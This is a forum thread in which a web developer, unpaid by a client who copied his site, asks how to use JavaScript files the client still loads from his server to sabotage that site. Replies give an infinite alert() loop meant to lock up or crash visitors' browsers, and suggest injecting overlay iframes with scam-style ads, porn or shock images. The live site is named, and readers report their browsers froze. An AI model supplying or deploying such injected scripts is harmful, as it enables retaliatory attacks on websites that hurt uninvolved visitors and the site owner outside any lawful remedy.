Client stole my web work, how to insert iFrame through JS?

xziler8r

Regular Member
Joined
Apr 27, 2009
Messages
206
Reaction score
234
I did some work for a client and they had owned me money. I came to find out the other day that they stole my entire code and put the website on a new domain and they already told me they intend not to pay at all. They're out of state and the amount isn't enough for me to go through any legal processes.

Since they stole me code, line for line, they're still calling a lot of js files on my server. I'm wanting to see if I can, somehow, inject a hidden iframe through one of my javascript files to load a big white block of space on their website. There is no <iframe> tag on the original source code, just divs'

Any suggestions on what I can do through JS to mess up their site?
 
Delete everything out of your javascript files on your server and just do

Code:
var x=0;
while(x==0)
{
  alert("STOP STEALING MY CODE");
}

It will make a nonstop popup of STOP STEALING MY CODE go on until they can either close the browser, or the browser crashes. If they stop calling your javascript functions though it won't work.
 
Yeah, at least in the meantime it'll piss em off and hopefully they won't know how to delete the lines calling my js, thanks a lot leprakhauns
 
EVIL :D, but i like it :)

Delete everything out of your javascript files on your server and just do

Code:
var x=0;
while(x==0)
{
  alert("STOP STEALING MY CODE");
}
It will make a nonstop popup of STOP STEALING MY CODE go on until they can either close the browser, or the browser crashes. If they stop calling your javascript functions though it won't work.
 
You can see it live at http://artpartnersgallery.com/ I was contracted by youneedasite.com and mckinleymediagroup.com (same person) to redesign her website (which is another domain) and he wanted me to be his puppet and make non-stop changes w/o payment. When I told him I needed extra funds he stole my code, put up this new domain for the client and didnt pay me what he had owned me up to that point.
 
wow haha what he gonna do now :D,

edit; i had to do that too kayzne.
 
Last edited:
You should iframe some type of offer on their site... Colon clense or something funny.
 
Longover - I would if I had someone give me the code to plug it in :)
 
Try looking into document.write and putting an iframe code in there with a style="z-index:100"; that should place it on top of everything idk if that will work tho
 
I tried this but it didnt work probably cause it needs the <iframe> tag in the code
Code:
   <script type="text/javascript">
    <!--
        function populateIframe() {
            var ifrm = document.getElementById('page');
            ifrm = (ifrm.contentWindow) ? ifrm.contentWindow : (ifrm.contentDocument.document) ? ifrm.contentDocument.document : ifrm.contentDocument;
            ifrm.document.open();
            ifrm.document.write('Hello World!');
            ifrm.document.close();
        }
    //-->
    </script>
 
I had to CTRL+DEL+ALT my browser. Wasted my 5 minutes. I suggest you to mention a warning near the url or remove the link completely from this thread.

I <3 your idea though..
 
Last edited:
make the popup tell the user this is a scam site and insert some gay porn ads if you can
 
I read the whole thread first, so knew what was coming. used IE, so I could alt control delete it.

finally a use for IE lol


Yep :P did same , better be safe than sorry,

Put there some gay porn pic on front page :D must be hell of panic for them when they find out it :D
 
Delete everything out of your javascript files on your server and just do

Code:
var x=0;
while(x==0)
{
  alert("STOP STEALING MY CODE");
}
It will make a nonstop popup of STOP STEALING MY CODE go on until they can either close the browser, or the browser crashes. If they stop calling your javascript functions though it won't work.

Calling Tub Girl.jpg would be more fun. I f you have no idea what tub girl is Google is your friend and you will know when you find it :::: Hint ::: turn off safe search
 
yes, but the popup will disable everything from their site from being seen.
 
should put some more in the message, saying anyone helping to change the site so he can avoid payment will be treated as an accessory to the theft.
 
Back
Top